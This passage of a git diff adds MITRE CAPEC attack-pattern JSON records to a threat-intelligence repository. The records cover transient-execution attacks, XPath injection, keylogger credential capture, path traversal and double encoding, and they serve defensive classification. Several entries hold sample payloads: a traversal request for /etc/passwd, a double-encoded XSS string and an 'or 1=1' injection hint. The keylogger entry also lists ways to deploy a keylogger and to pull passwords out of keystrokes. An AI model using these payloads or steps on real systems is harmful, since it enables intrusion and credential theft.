directory structure." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681.json new file mode 100644 index 0000000000000000000000000000000000000000..14517638b861f2283a5ffecdcf0f8175960d8496 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681.json @@ -0,0 +1,133 @@ +{ + "id": "bundle--efd07825-e253-4ded-af0b-5b3916a880e8", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a hardware design flaw in a CPU implementation of transient instruction execution to expose sensitive data and bypass/subvert access control over restricted resources. Typically, the adversary conducts a covert channel attack to target non-discarded microarchitectural changes caused by transient executions such as speculative execution, branch prediction, instruction pipelining, and/or out-of-order execution. The transient execution results in a series of instructions (gadgets) which construct covert channel and access/transfer the secret data.", + "external_references": [ + { + "external_id": "CAPEC-663", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/663.html" + }, + { + "external_id": "CWE-1037", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1037.html" + }, + { + "external_id": "CWE-1303", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1303.html" + }, + { + "external_id": "CWE-1264", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1264.html" + }, + { + "description": "Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz, Yuval Yarom, Spectre Attacks: Exploiting Speculative Execution, 2019, Graz University of Technology", + "external_id": "REF-637", + "source_name": "reference_from_CAPEC", + "url": "https://spectreattack.com/spectre.pdf" + }, + { + "description": "Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, Anders Fogh, Jann Horn, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval Yarom, Mike Hamburg, Meltdown: Reading Kernel Memory from User Space, 2018, Graz University of Technology", + "external_id": "REF-638", + "source_name": "reference_from_CAPEC", + "url": "https://meltdownattack.com/meltdown.pdf" + }, + { + "description": "Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens, Dmitry Evtyushkin, Daniel Gruss, A Systematic Evaluation of Transient Execution Attacks and Defenses, 2019--05---15, Graz University of Technology", + "external_id": "REF-639", + "source_name": "reference_from_CAPEC", + "url": "https://arxiv.org/abs/1811.05441" + }, + { + "description": "Qian Ge, Yuval Yarom, Gernot Heiser, A Survey of Microarchitectural Timing Attacks and Countermeasures on Contemporary Hardware, 2016--12---26, Journal of Cryptographic Engineering", + "external_id": "REF-640", + "source_name": "reference_from_CAPEC", + "url": "https://eprint.iacr.org/2016/613.pdf" + }, + { + "description": "Nael Abu-Ghazaleh, Dmitry Ponomarev, Dmitry Evtyushkin, How the Spectre and Meltdown Hacks Really Worked, 2019--02---28, IEEE Spectrum", + "external_id": "REF-641", + "source_name": "reference_from_CAPEC", + "url": "https://spectrum.ieee.org/computing/hardware/how-the-spectre-and-meltdown-hacks-really-worked" + }, + { + "description": "James Sanders, Spectre and Meltdown explained: A comprehensive guide for professionals, 2019--05---15, TechRepublic", + "external_id": "REF-642", + "source_name": "reference_from_CAPEC", + "url": "https://spectrum.ieee.org/computing/hardware/how-the-spectre-and-meltdown-hacks-really-worked" + }, + { + "description": "Alert (TA18-004A) Meltdown and Spectre Side-Channel Vulnerability Guidance, 2018--01---04, CISA", + "external_id": "REF-643", + "source_name": "reference_from_CAPEC", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-004A" + } + ], + "id": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Exploitation of Transient Instruction Execution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb" + ], + "x_capec_child_of_refs": [ + "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware", + "Software" + ], + "x_capec_example_instances": [ + "\n A web browser with user-privileges executes JavaScript code imbedded within a malicious website. The system does not disable shared buffers for the web browser and there is no restriction or check upon user-process execution of flush or evict instructions. The Javascript code executes vulnerable transient instructions upon system to cause microarchitectural changes that establish covert channel and transfer sensitive/secret data into shared cache from address space of either kernel, web browser or another executing process on the system.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey target application and relevant OS shared code libraries: Adversary identifies vulnerable transient instruction sets and the code/function calls to trigger them as well as instruction sets or code fragments (gadgets) to perform attack.

    2. Techniques
    Utilize Disassembler and Debugger tools to examine and trace instruction set execution of source code and shared code libraries on a system.

  2. Explore cache and identify impacts: Utilize tools to understand the impact of transient instruction execution upon address spaces and CPU operations.

    3. Techniques
    Run OS or application specific tools that examine the contents of cache.

Experiment

  1. Cause conditions for identified transient instruction set execution: Adversary ensures that specific code/instructions of the target process are executed by CPU, so desired transient instructions are executed.

  2. Cause specific secret data to be cached from restricted address space: Executed instruction sets (gadgets) in target address space, initially executed via adversary-chosen transient instructions sets, establish covert channel and transfer secret data across this channel to cache.

    3. Techniques
    Prediction-based - adversary trains CPU to incorrectly predict/speculate conditions for instruction execution to be true, hence executing adversary-chosen transient instructions. These prediction-based methods include: Pattern History Table (PHT)/Input Validation Bypass, Branch Target Buffer (BTB)/Branch Target Injection, Return Stack Buffer (RSB)/Return Address Injection, and Store To Load (STL)/Speculative Store Bypass.
    Exception/Fault-based - adversary has CPU execute transient instructions that raise an exception allowing inaccessible memory space to be accessed via out-of-order execution. These exception/fault-based methods include: Supervisor-only Bypass, Virtual Translation Bypass, System Register Bypass, FPU Register Bypass, Read-only Bypass, Protection Key Bypass, and Bounds Check Bypass.

Exploit

  1. Perform covert channel attack to obtain/access secret data: Adversary process code removes instructions/data from shared cache set, waits for target process to reinsert them back into cache, to identify location of secret data via a timing method. Adversary continuously repeat this process to identify and access entirety of targeted secret data.

    2. Techniques
    Flush+Reload - adversary frequently flushes targeted memory cache line using a dedicated machine flush instruction, and uses another process to measure time taken for CPU to load victim secret data.
    Evict+Time - adversary causes victim to load target set into cache and measures time for victim process to load this data, setting a baseline. Adversary evicts a specified cache line and causes victim process to execute again, and measures any change in execution time, to determine if cache line was accessed.
    Prime+Probe - adversary primes cache by filling cache line(s) or set(s) with data, after some time victim process evicts this adversary data to replace it with secret data. The adversary then probes/accesses all the previously accessed cache lines detecting cache misses, which determine that their attacker data has been evicted and replaced with secret data from victim process.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--f4d86f88-864b-4d41-9077-1f15f1db08c3" + ], + "x_capec_peer_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59", + "attack-pattern--d5e0c12f-6086-491d-86e5-e10a14d1f947", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_prerequisites": [ + "The adversary needs at least user execution access to a system and a maliciously crafted program/application/process with unprivileged code to misuse transient instruction set execution of the CPU." + ], + "x_capec_resources_required": [ + "C2C mechanism or direct access to victim system, capable of dropping malicious program and collecting covert channel attack data.", + "Malicious program capable of triggering execution of transient instructions or vulnerable instruction sequences of victim program and performing a covert channel attack to gather data from victim process memory space. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources of the victim machine." + ], + "x_capec_skills_required": { + "High": "Detailed knowledge on compiled binaries and operating system shared libraries of instruction sequences, and layout of application and OS/Kernel address spaces for data leakage." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c.json new file mode 100644 index 0000000000000000000000000000000000000000..2a500790c8819c4e047ab8fe6058989c785e0125 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--9405aa45-768b-4851-bae7-56a291874093", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This CAPEC has been deprecated because of is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "external_id": "CAPEC-566", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/566.html" + } + ], + "id": "attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c", + "modified": "2019-04-04T00:00:00.000Z", + "name": "DEPRECATED: Dump Password Hashes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b.json new file mode 100644 index 0000000000000000000000000000000000000000..33c2d785e47e1982c44f909e668bfd389bdf98b3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b.json @@ -0,0 +1,105 @@ +{ + "id": "bundle--3c532f79-478b-41ee-a77a-d7677b30d235", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker can craft special user-controllable input consisting of XPath expressions to inject the XML database and bypass authentication or glean information that they normally would not be able to. XPath Injection enables an attacker to talk directly to the XML database, thus bypassing the application completely. XPath Injection results from the failure of an application to properly sanitize input used as part of dynamic XPath expressions used to query an XML database.", + "external_references": [ + { + "external_id": "CAPEC-83", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/83.html" + }, + { + "external_id": "CWE-91", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/91.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "XPath Injection", + "external_id": "39", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XPath-Injection" + }, + { + "description": "Blind XPath Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Blind_XPath_Injection" + }, + { + "description": "XPATH Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/XPATH_Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-611", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection.html" + } + ], + "id": "attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "XPath Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--aa6a831a-8eae-4690-b4a2-ff3e4d43a716" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Consider an application that uses an XML database to authenticate its users. The application retrieves the user name and password from a request and forms an XPath expression to query the database. An attacker can successfully bypass authentication and login without valid credentials through XPath Injection. This can be achieved by injecting the query to the XML database with XPath syntax that causes the authentication check to fail. Improper validation of user-controllable input and use of a non-parameterized XPath expression enable the attacker to inject an XPath expression that causes authentication bypass." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an adversary records all instances of user-controllable input used to contruct XPath queries.

    2. Techniques
    Use an automated tool to record all instances of user-controllable input used to contruct XPath queries.
    Use a browser to manually explore the website and analyze how the application processes inputs.

  2. Determine the tructure of queries: Using manual or automated means, test inputs found for XPath weaknesses.

    3. Techniques
    Use an automated tool automatically probe the inputs for XPath weaknesses.
    Manually probe the inputs using characters such as single quote (') that can cause XPath-releated errors, thus indicating an XPath weakness.

Exploit

  1. Inject content into XPath query: Craft malicious content containing XPath expressions that is not validated by the application and is executed as part of the XPath queries.

    2. Techniques
    Use the crafted input to execute unexpected queries that can disclose sensitive database information to the attacker.
    Use a combination of single quote (') and boolean expressions such as \"or 1=1\" to manipulate XPath logic.
    Use XPath functions in the malicious content such as \"string-length\", \"substring\", or \"count\" to gain information about the XML document structure being used.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "XPath queries used to retrieve information stored in XML documents", + "User-controllable input not properly sanitized before being used as part of XPath queries" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "XPath Injection shares the same basic premises with SQL Injection. An attacker must have knowledge of XPath syntax and constructs in order to successfully leverage XPath Injection" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f.json new file mode 100644 index 0000000000000000000000000000000000000000..0b84396b9953b7ca2f4822b9d60d692113e2dcbc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f.json @@ -0,0 +1,56 @@ +{ + "id": "bundle--97f0341d-d96b-460b-adee-07e902219033", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary deploys a keylogger in an effort to obtain credentials directly from a system's user. After capturing all the keystrokes made by a user, the adversary can analyze the data and determine which string are likely to be passwords or other credential related information.", + "external_references": [ + { + "external_id": "CAPEC-568", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/568.html" + }, + { + "description": "Input Capture:Keylogging", + "external_id": "T1056.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056/001" + } + ], + "id": "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Capture Credentials via Keylogger", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--52103765-d380-42fc-aa4d-a8b24615548a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine which user's credentials to capture: Since this is a more targeted attack, an adversary will first identify a particular user they wish the capture the credentials of.

Experiment

  1. Deploy keylogger: Once a user is identified, an adversary will deploy a keylogger to the user's system in one of many ways.

    2. Techniques
    Send a phishing email with a malicious attachment that installs a keylogger on a user's system
    Conceal a keylogger behind fake software and get the user to download the software
    Get a user to click on a malicious URL that directs them to a webpage that will install a keylogger without their knowledge
    Gain access to the user's system through a vulnerability and manually install a keylogger

  2. Record keystrokes: Once the keylogger is deployed on the user's system, the adversary will record keystrokes over a period of time.

  3. Analyze data and determine credentials: Using the captured keystrokes, the adversary will be able to determine the credentials of the user.

    4. Techniques
    Search for repeated sequences that are following by the enter key
    Search for repeated sequences that are not found in a dictionary
    Search for several backspaces in a row. This could indicate a mistyped password. The correct password can then be inferred using the whole key sequence

Exploit

  1. Use found credentials: After the adversary has found the credentials for the target user, they will then use them to gain access to a system in order to perform some follow-up attack

", + "x_capec_prerequisites": [ + "The ability to install the keylogger, either in person or remote." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170.json new file mode 100644 index 0000000000000000000000000000000000000000..dfca66f99845c18fe9e72dfee29590c09dbfc766 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170.json @@ -0,0 +1,110 @@ +{ + "id": "bundle--a3a0c6ce-f66a-49b5-b116-6c2082e62b40", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses path manipulation methods to exploit insufficient input validation of a target to obtain access to data that should be not be retrievable by ordinary well-formed requests. A typical variety of this attack involves specifying a path to a desired file together with dot-dot-slash characters, resulting in the file access API or function traversing out of the intended directory structure and into the root file system. By replacing or modifying the expected path information the access function or API retrieves the file desired by the attacker. These attacks either involve the attacker providing a complete path to a targeted file or using control characters (e.g. path separators (/ or \\) and/or dots (.)) to reach desired directories or files.", + "external_references": [ + { + "external_id": "CAPEC-126", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/126.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "description": "Path Traversal", + "external_id": "33", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Path-Traversal" + }, + { + "description": "Path Traversal", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Path_Traversal" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "OWASP Testing Guide (v4), 2010, The Open Web Application Security Project (OWASP)", + "external_id": "REF-9", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-10", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246952/Path-Traversal" + } + ], + "id": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Path Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Directory Traversal" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642" + ], + "x_capec_child_of_refs": [ + "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Unreliable Execution (The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Read Data (The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Modify Data (The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An example of using path traversal to attack some set of resources on a web server is to use a standard HTTP request\n http://example/../../../../../etc/passwd\n From an attacker point of view, this may be sufficient to gain access to the password file on a poorly protected system. If the attacker can list directories of critical resources then read only access is not sufficient to protect the system.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to perform a valid path traversal, the attacker needs to know what the underlying OS is so that the proper file seperator is used.

    2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages

  2. Survey the Application to Identify User-controllable Inputs: The attacker surveys the target application to identify all user-controllable file inputs

Experiment

  1. Vary inputs, looking for malicious results: Depending on whether the application being exploited is a remote or local one, the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application

Exploit

  1. Manipulate files accessible by the application: The attacker may steal information or directly manipulate files (delete, copy, flush, etc.)

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62" + ], + "x_capec_prerequisites": [ + "The attacker must be able to control the path that is requested of the target.", + "The target must fail to adequately sanitize incoming paths" + ], + "x_capec_resources_required": [ + "The ability to manually manipulate path information either directly through a client application relative to the service or application or via a proxy application." + ], + "x_capec_skills_required": { + "Low": "Simple command line attacks or to inject the malicious payload in a web page.", + "Medium": "Customizing attacks to bypass non trivial filters in the application." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9.json new file mode 100644 index 0000000000000000000000000000000000000000..619fca557a6c632faeefaa66e8bc1e1f80861e27 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9.json @@ -0,0 +1,99 @@ +{ + "id": "bundle--c7f3cdbe-8aea-4b30-a8f2-d65379407f8c", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target.", + "external_references": [ + { + "external_id": "CAPEC-120", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-183", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + } + ], + "id": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Double Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Double Enconding Attacks can often be used to bypass Cross Site Scripting (XSS) detection and execute XSS attacks.:\n %253Cscript%253Ealert('This is an XSS Attack')%253C%252Fscript%253E\n Since <, <, and / are often sued to perform web attacks, these may be captured by XSS filters. The use of double encouding prevents the filter from working as intended and allows the XSS to bypass dectection. This can allow an adversary to execute malicious code.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an attacker records all entry points to the application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: Try double-encoding for parts of the input in order to try to get past the filters. For instance, by double encoding certain characters in the URL (e.g. dots and slashes) an adversary may try to get access to restricted resources on the web server or force browse to protected pages (thus subverting the authorization service). An adversary can also attempt other injection style attacks using this attack pattern: command injection, SQL injection, etc.

    2. Techniques
    Try to use double-encoding to bypass validation routines.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target's filters must fail to detect that a character has been doubly encoded but its interpreting engine must still be able to convert a doubly encoded character to an un-encoded character.", + "The application accepts and decodes URL string request.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_resources_required": [ + "Tools that automate encoding of data can assist the adversary in generating encoded strings." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fb5cd90b-cd8e-4df7-958b-6d0e4304507f.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fb5cd90b-cd8e-4df7-958b-6d0e4304507f.json new file mode 100644 index 0000000000000000000000000000000000000000..6afa6b719dd5f649a90a1d2d183b1fcda9b1c157 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fb5cd90b-cd8e-4df7-958b-6d0e4304507f.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--f3c11bde-9343-44be-9c74-e94a7c46e3c2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This pattern has been deprecated as it was 